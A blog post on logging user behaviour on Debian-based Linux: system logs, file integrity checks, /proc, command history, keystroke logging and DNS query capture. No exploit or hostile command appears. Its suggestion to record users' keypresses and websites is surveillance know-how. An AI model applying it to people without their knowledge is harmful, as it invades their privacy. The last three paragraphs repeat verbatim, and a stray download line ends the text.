Friday, September 22, 2017
User behavior logging
User behavior logging
In this blog post some ways to examine Linux operating system without using any additional (third party) programs or tools are explained. There are a number of Linux distributions but I will focus primarily on Debian and Debian based distributions. By collecting all the available information it is possible to track and log user behavior. Post consists of two parts: default system logs and other aspects which could be monitored.
In this part of the post some of the significant existing Linux system logs for user behavior are listed and explained:
- /var/log/messsages - contains general system activity and non-critical messages like user logins, kernel messages, IP firewall packet logging and so on. This log file doesnt exist on Debian Linux distributions, so instead syslog is used.
- /var/log/syslog - contains all the messages except the authentication related ones. By analyzing few, I found only kernel and thermald messages. Each line contains: datetime, hostname, program that generated the message, process id and log message.
- /var/log/auth.log - contains system authorization information including user logins through display and login managers, sudo access requests, authentication mechanism for crontab, policykit system daemon etc. This log file is found on Debian Linux distributions, but some other use /var/log/secure instead.
- /var/log/btmp - keeps track of failed login attempts. It is a binary file and can be read using last command.
- /var/log/dpkg.log & /var/log/yum.log - contain messages about installs or upgrades for various package managers.
It is important to point out that not all Linux distributions have those logs enabled. /etc/rsyslog.conf file controls what goes inside the log files while /etc/rsyslog.d/*.conf configuration files control what goes in log directory and where that directory is (default value is /var/log).
Also, log files can be easily modified or deleted. One solution is to set the log files to "append only" with chattr +a, but an attacker can gain root access so it is better to send logs to another host.
Other ways for tracking user behavior
Integrity checking is another way to detect changes in the system by looking for changes in the MD5/SHA1 checksums of the key files in the system. Those checksums need to be calculated periodically and compared with previous values. In such way inotify tool works by monitoring individual files or directories. It is important to check metadata such as permissions and ownerships, not just changes to file contents.
Besides monitoring logs for package installs, browser extensions are almost equally good for tracking user behavior. This can be done by checking integrity of directory where browser stores plugins, for example on Google Chrome it is ~/.config/google-chrome/Default/Extensions/ but on Mozilla Firefox it is /usr/lib/firefox-addons.
Running programs are easy to track and analyze because Linux contains virtual filesystem /proc with all process information. Directories inside /proc correspond to an actual process ID and by using command such as ps ax we can match processes with the associated process ID. Each of these directories contain information about command line arguments, CPU, current working directory, environment variables, links to the executables and library files of the process, memory held and process status. Directory /proc contains a lot more system information that can be analyzed such as: filesystems, IDE devices, memory map, I/O ports, general network information, parallel ports, partitions, general kernel behaviors, network core and interrupts.
Keyboard is the most used device by the user so that should be logged too (keypress and speed). There are also shell commands which are sensitive part of all Unix systems. They can be monitored in several ways but one of them is to use the command history. However, there are way too many ways to execute a command in any Unix system so it is not possible to monitor commands completely.
Since mostly users browse same websites daily, it can be useful for determining users behavior to log website visits. That can be done using rndc querylog which can log all DNS queries or using tcpdump and filtering only DNS queries (port 53).
Those are some of the ways to examine the status of some system and by that we can try to track user behavior. Also, there are some other parts of the system that are not mentioned but that is because I currently dont find them significant for purpose of the system I am building.
Keyboard is the most used device by the user so that should be logged too (keypress and speed). There are also shell commands which are sensitive part of all Unix systems. They can be monitored in several ways but one of them is to use the command history. However, there are way too many ways to execute a command in any Unix system so it is not possible to monitor commands completely.
Since mostly users browse same websites daily, it can be useful for determining users behavior to log website visits. That can be done using rndc querylog which can log all DNS queries or using tcpdump and filtering only DNS queries (port 53).
Those are some of the ways to examine the status of some system and by that we can try to track user behavior. Also, there are some other parts of the system that are not mentioned but that is because I currently dont find them significant for purpose of the system I am building.
download file now
